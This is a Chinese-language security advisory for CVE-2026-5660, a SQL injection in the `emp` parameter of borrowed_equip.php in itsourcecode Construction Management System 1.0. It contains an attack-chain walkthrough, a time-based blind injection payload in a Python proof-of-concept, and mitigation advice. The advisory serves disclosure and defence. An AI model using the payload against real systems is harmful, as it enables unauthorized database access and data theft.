CVE-2026-5660: itsourcecode管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-5660

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Construction Management System

漏洞概述

itsourcecode Construction Management System 1.0版本被发现存在SQL注入漏洞。该漏洞位于/borrowed_equip.php文件的参数处理组件中，主要涉及对`emp`参数的处理。由于系统未对用户输入进行充分过滤，攻击者可构造恶意SQL语句发起远程攻击。目前利用细节已公开，可能导致数据泄露、篡改及服务中断，建议尽快修复。

技术细节

该漏洞的根本原因是itsourcecode Construction Management System 1.0在开发过程中未能遵循安全编码规范。具体位于`/borrowed_equip.php`文件的参数处理逻辑中，程序直接接收用户通过GET或POST方式提交的`emp`参数，并将其动态拼接到后端数据库查询语句中，缺乏有效的输入验证和过滤机制。攻击者可以利用这一设计缺陷，构造包含单引号、UNION SELECT、AND/OR等SQL语法的恶意载荷。当服务器端解析并执行这些语句时，原本的查询逻辑被改变。考虑到CVSS评分为6.3（中危），且攻击者仅需低权限即可通过网络发起攻击，该漏洞具有较高的可利用性。成功利用后，攻击者可完全控制数据库，窃取敏感信息或破坏数据完整性，进而可能威胁整个服务器的安全。

攻击链分析

STEP 1

侦察

攻击者识别目标系统为itsourcecode Construction Management System 1.0，并确定受影响的端点/borrowed_equip.php。

STEP 2

漏洞探测

攻击者向目标端点发送包含特殊字符（如单引号）的测试请求，观察数据库错误响应或行为变化，确认存在SQL注入。

STEP 3

构造攻击载荷

攻击者根据探测结果，针对`emp`参数构造恶意的SQL语句（如UNION查询或布尔盲注语句）。

STEP 4

执行攻击

攻击者发送包含恶意载荷的HTTP请求，后端数据库执行该SQL语句。

STEP 5

数据窃取或破坏

数据库返回查询结果，攻击者获取敏感信息（如管理员密码），或者利用注入语句修改/删除数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli_vuln(target_url):
    """
    Proof of Concept for CVE-2026-5660 SQL Injection
    Target: /borrowed_equip.php?emp=
    """
    # Time-based blind SQL injection payload
    payload = "1' AND SLEEP(5)-- -"
    
    # Construct the full request URL
    # Assuming the parameter is passed via GET based on typical PHP vulns
    params = {
        "emp": payload
    }

    try:
        print(f"[*] Sending request to {target_url}...")
        response = requests.get(target_url, params=params, timeout=10)
        
        # Check if the response time indicates a delay (injection success)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability confirmed! The application responded with a delay.")
        else:
            print("[-] Vulnerability not detected based on timing.")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost/borrowed_equip.php"
    check_sqli_vuln(target)

影响范围

itsourcecode Construction Management System 1.0

防御指南

临时缓解措施

在官方补丁发布前，建议管理员检查`borrowed_equip.php`文件源码，对`emp`参数使用`intval()`强制类型转换或使用`mysqli_real_escape_string()`进行转义。同时，可在网络边界部署WAF规则，拦截针对该参数的SQL注入攻击载荷，并限制数据库用户的读写权限，以降低潜在风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5660
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5660
3 Details https://www.cvedetails.com/cve/CVE-2026-5660/
4 VulDB https://vuldb.com/cve/CVE-2026-5660
5 Link https://github.com/Learner636/CVE-smbmit/issues/4
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/submit/786062
8 Link https://vuldb.com/vuln/355484
9 Link https://vuldb.com/vuln/355484/cti